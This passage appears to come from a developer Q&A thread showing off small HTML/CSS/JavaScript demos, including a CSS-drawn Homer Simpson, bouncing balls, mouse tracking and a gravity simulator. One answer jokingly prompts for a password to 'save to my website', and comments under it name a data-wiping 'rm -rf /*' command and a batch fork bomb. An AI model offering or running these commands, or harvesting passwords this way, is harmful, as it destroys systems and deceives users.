solid #110b00;-webkit-transform:rotate(-21deg);-ms-transform:rotate(-21deg);transform:rotate(-21deg)}#homer .head .ear .inner2{top:3px;left:4px;width:7px;height:5px;-moz-border-radius:50%;-webkit-border-radius:50%;border-radius:50%;border-top:1px solid #110b00;-webkit-transform:rotate(-109deg);-ms-transform:rotate(-109deg);transform:rotate(-109deg)}#homer .head .ear .clip{top:1px;left:8px;width:5px;height:10px}#homer .head .right-eye{top:48px;left:48px;width:31px;height:31px;-moz-border-radius:50%;-webkit-border-radius:50%;border-radius:50%;background:#fff;box-shadow:-2px -1px 0 0 rgba(247,254,140,1);overflow:hidden}#homer .head .right-eye .right-eye-pupil{top:11px;left:20px;width:4px;height:4px;-moz-border-radius:50%;-webkit-border-radius:50%;border-radius:50%;background:#110b00}#homer .head .left-eye{top:51px;left:23px;width:31px;height:31px;-moz-border-radius:50%;-webkit-border-radius:50%;border-radius:50%;background:#fff;box-shadow:-1px -1px 0 0 rgba(247,254,140,1);overflow:hidden}#homer .head .left-eye .left-eye-pupil{top:13px;left:11px;width:4px;height:4px;-moz-border-radius:50%;-webkit-border-radius:50%;border-radius:50%;background:#110b00}#homer .head .left-eye .eyelid-top{top:-21px;left:0;width:30px;height:20px;border-bottom:1px solid #110b00;border-radius:50% 50% 0 0;-webkit-animation-name:homerlefteyelidtop;-webkit-animation-duration:10s;-webkit-animation-timing-function:linear;-webkit-animation-delay:1s;-webkit-animation-iteration-count:infinite;-webkit-animation-play-state:running;animation-name:homerlefteyelidtop;animation-duration:10s;animation-timing-function:linear;animation-delay:1s;animation-iteration-count:infinite;animation-play-state:running}#homer .head .left-eye .eyelid-bottom{bottom:-11px;left:0;width:30px;height:10px;border-top:1px solid #110b00;border-radius:0 0 50% 50%;-webkit-animation-name:homerlefteyelidbottom;-webkit-animation-duration:10s;-webkit-animation-timing-function:linear;-webkit-animation-delay:1s;-webkit-animation-iteration-count:infinite;-webkit-animation-play-state:running;animation-name:homerlefteyelidbottom;animation-duration:10s;animation-timing-function:linear;animation-delay:1s;animation-iteration-count:infinite;animation-play-state:running}@-webkit-keyframes homerlefteyelidtop{0%{top:-21px}2%{top:0}100%,4%{top:-21px}}@keyframes homerlefteyelidtop{0%{top:-21px}2%{top:0}100%,4%{top:-21px}}@-webkit-keyframes homerlefteyelidbottom{0%{bottom:-11px}2%{bottom:0}100%,4%{bottom:-11px}}@keyframes homerlefteyelidbottom{0%{bottom:-11px}2%{bottom:0}100%,4%{bottom:-11px}}#homer .head .right-eye .eyelid-top{top:-18px;left:0;width:30px;height:17px;border-bottom:1px solid #110b00;border-radius:50% 50% 0 0;-webkit-animation-name:homerrighteyelidtop;-webkit-animation-duration:10s;-webkit-animation-timing-function:linear;-webkit-animation-delay:1s;-webkit-animation-iteration-count:infinite;-webkit-animation-play-state:running;animation-name:homerrighteyelidtop;animation-duration:10s;animation-timing-function:linear;animation-delay:1s;animation-iteration-count:infinite;animation-play-state:running}#homer .head .right-eye .eyelid-bottom{bottom:-11px;left:0;width:30px;height:10px;border-top:1px solid #110b00;border-radius:0 0 50% 50%;-webkit-animation-name:homerrighteyelidbottom;-webkit-animation-duration:10s;-webkit-animation-timing-function:linear;-webkit-animation-delay:1s;-webkit-animation-iteration-count:infinite;-webkit-animation-play-state:running;animation-name:homerrighteyelidbottom;animation-duration:10s;animation-timing-function:linear;animation-delay:1s;animation-iteration-count:infinite;animation-play-state:running}@-webkit-keyframes homerrighteyelidtop{0%{top:-18px}2%{top:0}100%,4%{top:-18px}}@keyframes homerrighteyelidtop{0%{top:-18px}2%{top:0}100%,4%{top:-18px}}@-webkit-keyframes homerrighteyelidbottom{0%{bottom:-11px}2%{bottom:0}100%,4%{bottom:-11px}}@keyframes homerrighteyelidbottom{0%{bottom:-11px}2%{bottom:0}100%,4%{bottom:-11px}}#homer .head .nose{top:71px;left:50px;width:18px;height:12px;border-left:none;border-right:none;-webkit-transform:rotate(-13deg);-ms-transform:rotate(-13deg);transform:rotate(-13deg)}#homer .head .nose-tip{top:69px;left:60px;width:14px;height:12px;border-left:none;-moz-border-radius:0 50% 50% 0;-webkit-border-radius:0 50% 50% 0;border-radius:0 50% 50% 0;-webkit-transform:rotate(-13deg);-ms-transform:rotate(-13deg);transform:rotate(-13deg)}#homer .head .neck1{top:85px;left:16px;width:6px;height:31px;background:0 0;border-right:1px solid #110b00;border-radius:50% 50% 25%;-webkit-transform:rotate(-14deg);-ms-transform:rotate(-14deg);transform:rotate(-14deg);-webkit-box-shadow:2px 0 0 0 rgba(247,254,140,1),5px 0 0 0 rgba(251,216,0,1);-moz-box-shadow:2px 0 0 0 rgba(247,254,140,1),5px 0 0 0 rgba(251,216,0,1);box-shadow:2px 0 0 0 rgba(247,254,140,1),5px 0 0 0 rgba(251,216,0,1)}#homer .head .neck2{top:114px;left:25px;width:45px;height:19px;border-top:none;border-bottom:none;-webkit-box-shadow:inset 2px 0 0 0 rgba(247,254,140,1);-moz-box-shadow:inset 2px 0 0 0 rgba(247,254,140,1);box-shadow:inset 2px 0 0 0 rgba(247,254,140,1)}#homer .head .mouth1{top:86px;left:28px;width:48px;height:44px;background:#cfae67;-moz-border-radius:46% 52% 44% 50%;-webkit-border-radius:46% 52% 44% 50%;border-radius:46% 52% 44% 50%;-webkit-box-shadow:inset -1px -1px 0 0 rgba(152,110,36,1);-moz-box-shadow:inset -1px -1px 0 0 rgba(152,110,36,1);box-shadow:inset -1px -1px 0 0 rgba(152,110,36,1)}#homer .head .mouth2{top:101px;left:43px;width:48px;height:12px;background:#cfae67;-moz-border-radius:46% 52% 44% 50%;-webkit-border-radius:46% 52% 44% 50%;border-radius:46% 52% 44% 50%;-webkit-transform:rotate(-15deg);-ms-transform:rotate(-15deg);transform:rotate(-15deg);-webkit-box-shadow:inset -1px 0 0 0 rgba(152,110,36,1);-moz-box-shadow:inset -1px 0 0 0 rgba(152,110,36,1);box-shadow:inset -1px 0 0 0 rgba(152,110,36,1)}#homer .head .mouth3{top:102px;left:35px;width:48px;height:12px;background:0 0;-moz-border-radius:46% 52% 44% 50%;-webkit-border-radius:46% 52% 44% 50%;border-radius:46% 52% 44% 50%;border-bottom:1px solid #110b00;-webkit-transform:rotate(-4deg);-ms-transform:rotate(-4deg);transform:rotate(-4deg)}#homer .head .mouth4{top:110px;left:38px;width:7px;height:5px;-moz-border-radius:50%;-webkit-border-radius:50%;border-radius:50%;border-top:1px solid #110b00;-webkit-transform:rotate(-81deg);-ms-transform:rotate(-81deg);transform:rotate(-81deg)}#homer .head .mouth5{top:84px;left:64px;width:27px;height:13px;background:0 0;-moz-border-radius:46% 52% 44% 50%;-webkit-border-radius:46% 52% 44% 50%;border-radius:46% 52% 44% 50%;-webkit-transform:rotate(-131deg);-ms-transform:rotate(-131deg);transform:rotate(-131deg);border-top:none;-webkit-box-shadow:inset -1px -1px 0 0 rgba(152,110,36,1);-moz-box-shadow:inset -1px -1px 0 0 rgba(152,110,36,1);box-shadow:inset -1px -1px 0 0 rgba(152,110,36,1)}#homer .head .mouth6{top:84px;left:46px;width:32px;height:31px;background:#cfae67;-webkit-transform:rotate(-18deg);-ms-transform:rotate(-18deg);transform:rotate(-18deg);-moz-border-radius:0 0 0 22px;-webkit-border-radius:0 0 0 22px;border-radius:0 0 0 22px}#homer .head .mouth7{top:104px;left:62px;width:17px;height:12px;background:#cfae67;-moz-border-radius:46% 52% 44% 50%;-webkit-border-radius:46% 52% 44% 50%;border-radius:46% 52% 44% 50%;border-left:none;border-bottom:none;-webkit-transform:rotate(6deg);-ms-transform:rotate(6deg);transform:rotate(6deg)}#homer .head .mouth8{top:79px;left:71px;width:15px;height:30px;background:#cfae67;-moz-border-radius:50%;-webkit-border-radius:50%;border-radius:50%;-webkit-transform:rotate(-30deg);-ms-transform:rotate(-30deg);transform:rotate(-30deg)}
```

```html
<div id="homer"><div class="head"><div class="hair1"></div><div class="hair2"></div><div class="body head-top"></div><div class="no-border body head-main"></div><div class="no-border m1"></div><div class="no-border m2"></div><div class="no-border m3"></div><div class="no-border m4"></div><div class="no-border neck1"></div><div class="body neck2"></div><div class="body ear"><div class="no-border inner1"></div><div class="no-border inner2"></div><div class="no-border body clip"></div></div><div class="mouth"><div class="mouth5"></div><div class="mouth2"></div><div class="mouth1"></div><div class="mouth7"></div><div class="no-border mouth3"></div><div class="no-border mouth4"></div><div class="no-border mouth6"></div><div class="no-border mouth8"></div></div><div class="right-eye"><div class="no-border right-eye-pupil"></div><div class="no-border body eyelid-top"></div><div class="no-border body eyelid-bottom"></div></div><div class="body nose"></div><div class="body nose-tip"></div><div class="left-eye"><div class="no-border left-eye-pupil"></div><div class="no-border body eyelid-top"></div><div class="no-border body eyelid-bottom"></div></div></div></div>
```

Comment: Love it, although probably easier to use illustrator and SVG

Comment: I can't get over that 2x2 px square in the top left conrner

Comment: It needs `#homer > .head > .mouth{border:none}` or something like that.

Answer (score 9):

#### Bouncing balls

```js
var B0=null,B1=null,MAXV=3.0,TWOPI=2.0*Math.PI;

function Ball(b)
{
 this.b=b;
 this.vy=3.0 + MAXV*Math.sqrt(Math.random());
 var temp=Math.random()*TWOPI; 
 this.vx=this.vy*Math.cos(temp);
 this.vy*=Math.sin(temp); 
 this.x=this.y=null;
  
 return this;
}

function anyColor()
{
 var r=Math.floor(Math.random()*256.0);
 var g=Math.floor(Math.random()*256.0);
 var b=Math.floor(Math.random()*256.0);

 return "rgb(" + r + "," + g + "," + b + ")";
}

function moveBalls()
{
 var temp=B0.x + B0.vx;
 if ( 10<temp && temp<140 ) B0.x=temp;
 else {
    B0.vx=(-B0.vx);
    B0.b.style.backgroundColor=anyColor();
 }
 temp=B0.y + B0.vy;
 if ( 10<temp && temp<140 ) B0.y=temp;
 else {
    B0.vy=(-B0.vy);
    B0.b.style.backgroundColor=anyColor();
 }
 temp=B1.x + B1.vx;
 if ( 10<temp && temp<140 ) B1.x=temp;
 else {
    B1.vx=(-B1.vx);
    B1.b.style.backgroundColor=anyColor();
 }
 temp=B1.y + B1.vy;
 if ( 10<temp && temp<140 ) B1.y=temp;
 else {
    B1.vy=(-B1.vy);
    B1.b.style.backgroundColor=anyColor();
 }
 if ( Math.sqrt(Math.pow(B0.x - B1.x,2) + Math.pow(B0.y - B1.y,2))<=20 ) {
    (temp=B0.vx),(B0.vx=B1.vx),(B1.vx=temp);
    (temp=B0.vy),(B0.vy=B1.vy),(B1.vy=temp);
  }
 B0.b.style.left=Math.round(B0.x) - 10 + "px";
 B0.b.style.top=Math.round(B0.y) - 10 + "px"; 
 B1.b.style.left=Math.round(B1.x) - 10 + "px";
 B1.b.style.top=Math.round(B1.y) -10 + "px";  
 setTimeout(moveBalls,46);
}


window.onload
=function ()
{
 B0=document.getElementsByTagName("p"); 
 B1=new Ball(B0[0]);
 B0=new Ball(B0[1]); 
 B0.b.style.backgroundColor="#f00";
 B0.x=25; 
 B0.b.style.left=B0.x + "px";
 B0.y=75; 
 B0.b.style.top=B0.y + "px"; 
 B1.b.style.backgroundColor="#00f";
 B1.x=110; 
 B1.b.style.left=B1.x + "px";
 B1.y=75; 
 B1.b.style.top=B1.y + "px"; 
 moveBalls();
};
```

```css
div, p
{
  border:0;
  margin:0;
 padding:0; 
}

div
{
          position:relative;
             width:150px;
            height:150px;
            margin:0 auto;
            border:1px solid #000;
  background-color:#ffe;
}

div p
{
      position:absolute;
         width:20px;
        height:20px;
 border-radius:10px;
}
```

```html
<div><p></p><p></p></div>
```

Answer (score 8):

```js
    var password = window.prompt("What is your password?");
    //TODO: save password to my website
    alert("Thanks!");
```

Comment: Natural selection. Like it. :)

Comment: how do you implement the todo?

Comment: @MartinCapodici by running `rm -rf /*` on your server to set up the hacker toolkit.

Comment: @CamiloMartin don't forget sudo

Comment: @MartinCapodici A `%0|%0` inside a batch file also works wonders.

Comment: Typed a fake password. My password is so elegant no one can crack it! Who would guess it is 1234.... uh... no it isn't... It is 4321... yeah...

Comment: @Zoe The saddest part is how many people **actually** think like that...

Answer (score 8):

I still want to add JSFiddles, I'm practicing recursion. Can I?

```html
<iframe width="100%" height="300" src="https://jsfiddle.net/bigood/g7bv12as/5/embedded/result" allowfullscreen="allowfullscreen" frameborder="0"></iframe>
```

#### Yes, but no.

It breaks with an error:

> Uncaught SecurityError: Failed to read the 'cookie' property from
> 'Document': The document is sandboxed and lacks the
> 'allow-same-origin' flag.

Answer (score 8):

#### Mouse tracking

```js
window.onload
=
function ()
{
 /* Original Image: 55 X 75 */
 var DOSPI=2.0*Math.PI,DPH=Math.PI/30.0,IMG=document.getElementById("MSO_MIA");
 var HALFW=Math.round(55.0/2.0),HALFH=Math.round(75.0/2.0);
 var P=document.getElementById("point");
 var R=Math.round(1.5*(( HALFW<HALFH ) ? HALFH:HALFW));
 var ph=0,x=null,y=null;
 
 document.onmousemove
 =
 function (evento)
 {
  if ( !evento ) evento=window.event;
  x=evento.clientX;
  y=evento.clientY;
  P.style.left=x + "px";
  P.style.top=y + "px";
  IMG.style.left=Math.round(x - HALFW + R*Math.cos(ph)) + "px";
  IMG.style.top=Math.round(y - HALFH + R*Math.sin(ph)) + "px";
  if ( (ph+=DPH)>DOSPI ) ph=0;
 };
};
```

```css
#elDiv { position:relative; }
#elDiv img, #elDiv p { position:absolute; }

#elDiv p
{
        width:6px;
       height:6px;
border-radius:3px;
 background-color:#f00; 
}
```

```html
<div id="elDiv">
  <p id="point"></p>
  <img id ="MSO_MIA" src="https://dl.dropboxusercontent.com/u/17123168/MSO.png">
</div>
```

Comment: I feel this is a metaphor for MSO as a whole. You are the red dot, and MSO revolves around you. You are not the center of the universe, because you have to move for it to function. You also have no control over how MSO moves. You can't ask it to go backwards, it only moves forward. And consistently, for a brief instance, MSO will completely cover you up so that you are inconsequential. In the end, you are trying to move in a line, and MSO will be running circles around you.

Comment: @gunr2171 I didn't think about it. However, it's your free interpretation. Thanks.

Comment: It was all meant as a joke, trying to find a "deep" meaning in something like that.

Answer (score 8):

## 2D Solar System Simulator

```js
const G = 6.674e-11, 
  MAX_RND_VEL = 5,
  MAX_RND_MASS = 5e12,
  MIN_RND_MASS = 50,
  MAX_RND_SIZE = 8,
  PI = Math.PI,
  TWOPI = Math.PI * 2,
  FADE_RATE = 4,
  CURSOR_LINE_COLOR = "cyan",
  OBJECT_BORDER_COLOR = "white",
  CANVAS_BACKGROUND = "black",
  GRAVITY_FIELD_MARKER_COLOR = "rgb(150,200,150)",
  GRAVITY_FIELD_MARKER_RADIUS = 0.5,
  TRACK_GRADIENT_FADE_RATE = 0.015,
  TIMESTEP = 0.5,
  MAX_FIELD_DISTANCE = 900,
  canvas = document.getElementById("canvas"),
  chkShowFabric = document.getElementById("ShowFabric"),
  chkTrackObjects = document.getElementById("chkTrack"),
  ddlFabricGranularity = document.getElementById("FabricGranularity"),
  ddlRestitution = document.getElementById("Restitution"),
  ddlBorderBehavior = document.getElementById("BorderBehavior"),
  ddlObjectSize = document.getElementById("ObjectSize"),
  ddlObjectColor = document.getElementById("ObjectColor"),
  chkHandleCollisions = document.getElementById("chkCollisions"),
  btnNextStep = document.getElementById("NextStep"),
  btnAutoStep = document.getElementById("AutoStep"),
  txtDelay = document.getElementById("Delay");
const WIDTH = canvas.width,
  HEIGHT = canvas.height,
  DOUBLE_SIZE = MAX_RND_SIZE * 2,
  SCALE = MAX_RND_SIZE / Math.pow(3 * MAX_RND_MASS / 4 / PI, 1/3),
  ctx = canvas.getContext("2d");
let numObjects = 0,
  cellSize = ddlFabricGranularity.value,
  borderBehavior = ddlBorderBehavior.value,
  objectSize = +(ddlObjectSize.value),
  objectColor = ddlObjectColor.value,
  showFabric = chkShowFabric.checked,
  shouldHandleCollisions = chkHandleCollisions.checked,
  trackObjects = chkTrackObjects.checked,
  Cr = ddlRestitution.value, // coefficient of restitution
  delay = txtDelay.value,
  time = 0,
  stellarObjects,
  isRunning = false,
  isPlanting = false,
  plantX, plantY, mouseX, mouseY, 
  gField = [],
  gHeight, gWidth; 
let fadeMultiplier = cellSize / FADE_RATE;
ddlRestitution.addEventListener("change", changeCoefficientOfRestitution);
chkHandleCollisions.addEventListener("change", changeHandleCollisions);
chkTrackObjects.addEventListener("change",changeTrackObjects);
canvas.addEventListener("mousedown", touchDown);
canvas.addEventListener("mousemove", touchMove);
canvas.addEventListener("mouseup", touchUp);
canvas.addEventListener("mouseout", stopPlanting);
ddlBorderBehavior.addEventListener("change", changeBorderBehavior);
ddlObjectSize.addEventListener("change",changeObjectSize);
ddlObjectColor.addEventListener("change",changeObjectColor);
document.getElementById("Reset").addEventListener("click",reset);
document.getElementById("NextStep").addEventListener("click", step);
ddlFabricGranularity.addEventListener("change",changeFabricGranularity);
chkShowFabric.addEventListener("change",changeShowFabric);
btnAutoStep.addEventListener("click", toggleAutoStep);
txtDelay.addEventListener("change", changeDelay);
reset();
toggleAutoStep();
function changeCoefficientOfRestitution() {
  Cr = ddlRestitution.value;
}
function changeHandleCollisions() {
  shouldHandleCollisions = chkHandleCollisions.checked;
}
function changeTrackObjects(){
 trackObjects = chkTrackObjects.checked;
}
function stopPlanting() {
 isPlanting = false;
 if (!isRunning) {
  drawFieldAndObjects();
 }
}
function changeBorderBehavior() {
  borderBehavior = ddlBorderBehavior.value;
}
function changeObjectSize(){
 objectSize = +(ddlObjectSize.value);
}
function changeObjectColor(){
 objectColor = ddlObjectColor.value;
}
function changeFabricGranularity() {
  cellSize = ddlFabricGranularity.value;
  fadeMultiplier = cellSize / FADE_RATE;
  reinitializeGravityField();
  recalculateGravityField();
  drawFieldAndObjects();
}
function changeShowFabric() {
  showFabric = chkShowFabric.checked;
}
function toggleAutoStep() {
  if (isRunning) {
    clearTimeout(isRunning);
    btnNextStep.disabled = false;
    isRunning = null;
    btnAutoStep.value = "Auto";
  } else {
    btnNextStep.disabled = true;
    btnAutoStep.value = "Stop";
    isRunning = setTimeout(loopStep, delay);
  }
}
function changeDelay () {
 delay = +(txtDelay.value);
}
function touchDown(event) {
  if (event.which === 3 || event.button === 2) {
    event.preventDefault();
    return false;
  } else {
    isPlanting = true;
    plantX = event.pageX - canvas.offsetLeft;
    plantY = event.pageY - canvas.offsetTop;
    mouseX = plantX;
    mouseY = plantY;
  }
  event.preventDefault();
}

function touchMove(event) {
  if (isPlanting) {
    mouseX = event.pageX - canvas.offsetLeft;
    mouseY = event.pageY - canvas.offsetTop;
    if (!isRunning) {
     drawFieldAndObjects();
    }
    drawCursorLine();
  }
  event.preventDefault();
}

function touchUp(event) {
  if (event.which === 3 || event.button === 2) {
    removeObjectAt(event.pageX - canvas.offsetLeft, event.pageY - canvas.offsetTop);
    event.preventDefault();
    return false;
  } else {
    if (isPlanting) {
      let thing = getRandomStellarObject(),
        upX = event.pageX - canvas.offsetLeft,
        upY = event.pageY - canvas.offsetTop;
      if (typeof plantX === "undefined") {
        plantX = upX;
        plantY = upY;
      }
      thing.x = upX;
      thing.y = upY;
      thing.velocity.x = MAX_RND_VEL * MAX_RND_VEL * (plantX - upX) / WIDTH;
      thing.velocity.y = MAX_RND_VEL * MAX_RND_VEL * (plantY - upY) / HEIGHT;
      stellarObjects.push(thing);
      numObjects++;
      isPlanting = false;      
      applyObjectGravityToFabric(upX, upY, thing.mass * G);
      drawFieldAndObjects();      
    }
  }
  event.preventDefault();
}

function reset() {
 ctx.clearRect(0, 0, WIDTH, HEIGHT);
  reinitializeGravityField();
  stellarObjects = [
   getStellarObject( "orange", 1.2, WIDTH/2, HEIGHT/2, 0, 0.002), 
    getStellarObject( "magenta", .001, WIDTH*6.7/8, HEIGHT/2, 0, 2.4),
    getStellarObject( "green", .07, WIDTH*1.8/5, HEIGHT/2, 0.00, -2.2),
    getStellarObject( "red", .1, WIDTH*4/5, HEIGHT/2, 0.00, 1.5)
    ];
  numObjects = stellarObjects.length;
  step();
}

function loopStep() {
  let startTime = +new Date,
    delta;
  step();
  if (delay === 0 || (delta = +new Date - startTime) >= delay) {
    isRunning = setTimeout(loopStep, 0);
  } else {
    isRunning = setTimeout(loopStep, delay - delta);
  }
}

function step() {
  if(!trackObjects){
   ctx.clearRect(0, 0, WIDTH, HEIGHT);
  }else{
   ctx.fillStyle = CANVAS_BACKGROUND;
    ctx.globalAlpha = TRACK_GRADIENT_FADE_RATE;
   ctx.fillRect(0,0,WIDTH,HEIGHT);
    ctx.globalAlpha = 1;
  }
  if(showFabric){
   resetGravityFieldInPlace();
    moveObjects();
    drawGravityField();
  }else{
   moveObjects();
  }
  drawObjects();
}

function removeObjectAt(x, y) {
  for (let i = stellarObjects.length - 1; i >= 0; i--) {
    let obj = stellarObjects[i];
    if (getDistance(obj.x - x, obj.y - y) <= obj.size) {
      stellarObjects.splice(i, 1);
    }
  }
  let newLength = stellarObjects.length;
  if (newLength != numObjects) {
    numObjects = newLength;
    ctx.clearRect(0, 0, WIDTH, HEIGHT);
    if (showFabric) {
      resetGravityFieldInPlace();
      recalculateGravityField();
      drawGravityField();
    }
    drawObjects();
  }
}

function moveObjects() {
 time += TIMESTEP;
  if (shouldHandleCollisions) {
    for (let i = 0; i < numObjects; i++) {
      let o = stellarObjects[i];
      let ov = o.velocity, oa = o.acc;
      checkCollision(o, TIMESTEP*(ov.x + TIMESTEP*oa.x/2), TIMESTEP*(ov.y + TIMESTEP*oa.y/2), []);
    }
  }
  for (let i = 0; i < numObjects; i++) {
    let o = stellarObjects[i];
    let ov = o.velocity, oa = o.acc, ooa = o.oldAcc;
    let ovx = ov.x,ovy = ov.y, oax = oa.x, oay = oa.y;
    o.x += TIMESTEP*(ovx + TIMESTEP * oa.x/2);
    o.y += TIMESTEP*(ovy + TIMESTEP * oa.y/2);
    ooa.x = oax, ooa.y = oay;
    oa.x = 0, oa.y = 0;
    let ox = o.x,
      oy = o.y;
    if (borderBehavior !== "Unbounded") {
      if (borderBehavior === "Loop") {
        if (ox > WIDTH) {
          o.x = 0;
        } else if (ox < 0) {
          o.x = WIDTH;
        }
        if (oy > HEIGHT) {
          o.y = 0;
        } else if (oy < 0) {
          o.y = HEIGHT;
        }
      } else if (borderBehavior === "Ricochet") {
        if (ox > WIDTH || ox < 0) {
          o.velocity.x = ovx * -1;
        }
        if (oy > HEIGHT || oy < 0) {
          o.velocity.y = -1 * ovy;
        }
      } else if (borderBehavior === "HalfRicochet") {
        if (ox > WIDTH || ox < 0) {
          o.velocity.x = ovx * (-0.5);
          if (ox > WIDTH) {
            o.x = WIDTH;
          } else if (ox < 0) {
            o.x = 0;
          }
        }
        if (oy > HEIGHT || oy < 0) {
          o.velocity.y = (-0.5) * ovy;
          if (oy > HEIGHT) {
            o.y = HEIGHT;
          } else if (oy < 0) {
            o.y = 0;
          }
        }
      } else if (borderBehavior === "Annihilate") {
        if (ox > WIDTH || oy > HEIGHT || ox < 0 || oy < 0) {
          removeObjectAt(ox, oy);
        }
      }
    }
  }
  applyObjectsGravity();
  for (let i = 0; i < numObjects; i++) {
    let o = stellarObjects[i];
    o.velocity.x += TIMESTEP * (o.acc.x + o.oldAcc.x) / 2;
    o.velocity.y += TIMESTEP * (o.acc.y + o.oldAcc.y) / 2;
  }
}

function checkCollision(obj, ovx, ovy, objectsToIgnore) {
  for (let i = 0; i < numObjects; i++) {
    let test = stellarObjects[i],
      shortCircuit = false;
    if (test === obj) {
      continue;
    }
    for (let j = 0, len = objectsToIgnore.length; j < len; j++) {
      if (test === objectsToIgnore[j]) {
        shortCircuit = true;
        break;
      }
    }
    if (shortCircuit) {
      continue;
    }
    let oa = obj.acc, ta = test.acc;
    let ox = obj.x + TIMESTEP*(ovx + TIMESTEP * oa.x/2),
      oy = obj.y + TIMESTEP*(ovy + TIMESTEP * oa.y/2),
      tv = test.velocity;
    let tvx = tv.x,
      tvy = tv.y;
    let tx = test.x + TIMESTEP*(tvx + TIMESTEP * ta.x/2),
      ty = test.y + TIMESTEP*(tvy + TIMESTEP * ta.y/2);
    let difx = tx - ox,
      dify = ty - oy;
    if (difx === 0 && dify === 0){
      continue;
    }
    let aSize = obj.size,
      bSize = test.size;
    let cumulativeSize = aSize + bSize;
    let distance = getDistance(difx, dify);
    if (distance < cumulativeSize) {
      handleCollision(obj, test, cumulativeSize, difx, dify, distance, ox, oy, tx, ty);
      checkCollision(test, tvx, tvy, [obj].concat(objectsToIgnore)); // objectsToIgnore prevents a "Night at the Roxbury" collision loop // [obj].concat(objectsToIgnore)
      checkCollision(obj, ovx, ovy, [test].concat(objectsToIgnore));
    }
  }
}

function handleCollision(first, second, cumulativeSize, difX, difY, distance, x1, y1, x2, y2) {
  let mass1 = first.mass,
    mass2 = second.mass;
  let cumulativeMass = mass1 + mass2;
  let v1x = first.velocity.x,
    v1y = first.velocity.y,
    v2x = second.velocity.x,
    v2y = second.velocity.y;
  let v1 = Math.sqrt(v1x * v1x + v1y * v1y),
    v2 = Math.sqrt(v2x * v2x + v2y * v2y);
  let collisionAngle = Math.atan2(difY, difX);
  let dir1 = Math.atan2(v1y, v1x),
    dir2 = Math.atan2(v2y, v2x);
  let d1cA = dir1 - collisionAngle,
    d2cA = dir2 - collisionAngle;
  let newXv1 = v1 * Math.cos(d1cA),
    newYv1 = v1 * Math.sin(d1cA),
    newXv2 = v2 * Math.cos(d2cA),
    newYv2 = v2 * Math.sin(d2cA);
  let massVCalc = mass1 * newXv1 + mass2 * newXv2;
  let finalXv1 = (massVCalc + mass2 * Cr * (newXv2 - newXv1)) / cumulativeMass,
    finalXv2 = (massVCalc + mass1 * Cr * (newXv1 - newXv2)) / cumulativeMass,
    finalYv1 = newYv1,
    finalYv2 = newYv2;
  let cosAngle = Math.cos(collisionAngle),
    sinAngle = Math.sin(collisionAngle);
  first.velocity = {
    x: cosAngle * finalXv1 - sinAngle * finalYv1,
    y: sinAngle * finalXv1 + cosAngle * finalYv1
  };  
  second.velocity = {
    x: cosAngle * finalXv2 - sinAngle * finalYv2,
    y: sinAngle * finalXv2 + cosAngle * finalYv2
  };  
  let dx = first.x - second.x,
    dy = first.y - second.y;
  if(dx === 0 && dy === 0){ // special case for shared centers of gravity, offsets objects in random directions before continuing
     let xOffset = (Math.random()*1);
      let yOffset = (1 - xOffset)*(Math.random()*2 > 1 ? -1 : 1 );
      xOffset *= (Math.random()*2 > 1 ? -1 : 1 );
      first.x += xOffset / mass1;
      first.y += yOffset / mass1;
      second.x -= xOffset / mass2;
      second.y -= yOffset / mass2;
      dx = first.x - second.x;
      dy = first.y - second.y;
  }
  let d_squared = (dx * dx + dy * dy);
  if (d_squared <= cumulativeSize*cumulativeSize) {   
    let d = Math.sqrt(d_squared);
    let mtd_multiplier = ((first.size + second.size - d) / d);
    let mtd_x = mtd_multiplier * dx;
    let mtd_y = mtd_multiplier * dy;
    let im1 = 1 / mass1,
        im2 = 1 / mass2;
    let cumIm = im1 + im2;
    let imCalc1 = (im1 / (cumIm)),
        imCalc2 = (im2 / (cumIm));
    first.x += mtd_x * imCalc1;
    first.y += mtd_y * imCalc1;
    second.x -= mtd_x * imCalc2;
    second.y -= mtd_y * imCalc2;
    first.acc = {x:0,y:0};
    first.oldAcc = {x:0,y:0};
  second.acc = {x:0,y:0};
    second.oldAcc = {x:0,y:0};
  }
}

function applyObjectsGravity() {
  for (let i = numObjects-1; i >= 0; i--) {
    let o = stellarObjects[i];
    let ox = o.x,
      oy = o.y,
      om = o.massEffect;
    applyObjectGravityToObjects(o, ox, oy, om, i);
    if (showFabric) {
      applyObjectGravityToFabric(ox, oy, om);
    }
  }
}

function applyObjectGravityToObjects(stellarObject, x, y, massEffect, init) {
 let objAcc = stellarObject.acc, objOldAcc = stellarObject.oldAcc;
  for (let i = init; i >= 0; i--) {
    let currentTarget = stellarObjects[i];
    if (currentTarget !== stellarObject) {
      let targetX = currentTarget.x,
        targetY = currentTarget.y,
        targetME = currentTarget.massEffect,
        targetAcc = currentTarget.acc, targetOldAcc = currentTarget.oldAcc;
      let difY = y - targetY,
        difX = x - targetX;
      let distance = getDistance(difY, difX);
      if (distance !== 0) {
        let distSqr = distance * distance;
        let accelTarg = massEffect / distSqr,
         accelObj = targetME / distSqr;
        let yIsNegative = difY < 0;
        let theta = Math.atan(difX / difY);
        targetAcc.x += difX === 0 ? 0 : ((yIsNegative ? -1 : 1) * accelTarg * Math.sin(theta));
        targetAcc.y += difY === 0 ? 0 : ((yIsNegative ? -1 : 1) * accelTarg * Math.cos(theta));
        objAcc.x -= difX === 0 ? 0 : ((yIsNegative ? -1 : 1) * accelObj * Math.sin(theta));
        objAcc.y -= difY === 0 ? 0 : ((yIsNegative ? -1 : 1) * accelObj * Math.cos(theta));
      }
    }
  }
}

function applyObjectGravityToFabric(x, y, massEffect) {
 let xMeasure = x/cellSize, yMeasure = y/cellSize;
  for (let i = 0; i < gHeight; i++) {
    let row = gField[i];
    for (let j = 0; j < gWidth; j++) {
      let currentVector = row[j];
      let oX = currentVector[0],
        oY = currentVector[1],
        difX = xMeasure - j,
        difY = yMeasure - i;
      if(difX*difX + difY*difY < MAX_FIELD_DISTANCE ){
      let distance = getDistance(difX, difY);
      if ( distance !== 0) {
        let force = (massEffect) / (distance * distance);
        let xIsNegative = difX < 0,
          yIsNegative = difY < 0;
        let theta = Math.atan(difX / difY);
        currentVector[0] += difX === 0 ? 0 : ((yIsNegative ? -1 : 1) * force * Math.sin(theta));
        currentVector[1] += difY === 0 ? 0 : ((yIsNegative ? -1 : 1) * force *  Math.cos(theta));
      }
      }
    }
  }
}

function recalculateGravityField() {
  for (let i = 0; i < numObjects; i++) {
    let o = stellarObjects[i];
    applyObjectGravityToFabric(o.x, o.y, o.massEffect);
  }
}

function resetGravityFieldInPlace() {
  for (let i = 0; i < gHeight; i++) {
    let row = gField[i];
    for (let w = 0; w < gWidth; w++) {
      row[w] = [0,0];
    }
  }
}

function reinitializeGravityField() {
  gField = [];
